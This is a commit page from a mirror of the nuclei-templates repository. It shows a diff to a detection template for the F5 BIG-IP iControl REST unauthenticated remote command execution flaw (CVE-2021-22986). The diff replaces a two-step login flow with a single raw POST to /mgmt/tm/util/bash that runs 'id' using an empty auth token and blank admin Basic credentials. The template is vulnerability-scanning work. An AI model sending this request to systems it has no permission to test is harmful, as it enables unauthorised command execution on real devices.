daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix CVE-2021-22986.yaml

patch-1
Swissky 2021-10-03 12:24:46 +02:00
parent 037696e353
commit 5ec6402b7a
1 changed files with 8 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
cves/2021/CVE-2021-22986.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-22986 id: CVE-2021-22986
info: info:
name: F5 BIG-IP iControl REST unauthenticated RCE name: F5 BIG-IP iControl REST unauthenticated RCE
author: rootxharsh,iamnoooob author: rootxharsh,iamnoooob,swissky
severity: critical severity: critical
tags: bigip,cve,cve2021,rce tags: bigip,cve,cve2021,rce
description: The iControl REST interface has an unauthenticated remote command execution vulnerability. description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
@ -15,25 +15,18 @@ info:
requests: requests:
- raw: - raw:
- |
POST /mgmt/shared/authn/login HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Authorization: Basic YWRtaW46
Content-Type: application/json
Cookie: BIGIPAuthCookie=1234
Connection: close
{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
- | - |
POST /mgmt/tm/util/bash HTTP/1.1 POST /mgmt/tm/util/bash HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept-Language: en Accept-Encoding: gzip, deflate
X-F5-Auth-Token: §token§ Accept: */*
Content-Type: application/json
Connection: close Connection: close
Content-Type: application/json
X-F5-Auth-Token:
Authorization: Basic YWRtaW46
Content-Length: 42
{"command":"run","utilCmdArgs":"-c id"} {"command": "run", "utilCmdArgs": "-c id"}
extractors: extractors:
- type: regex - type: regex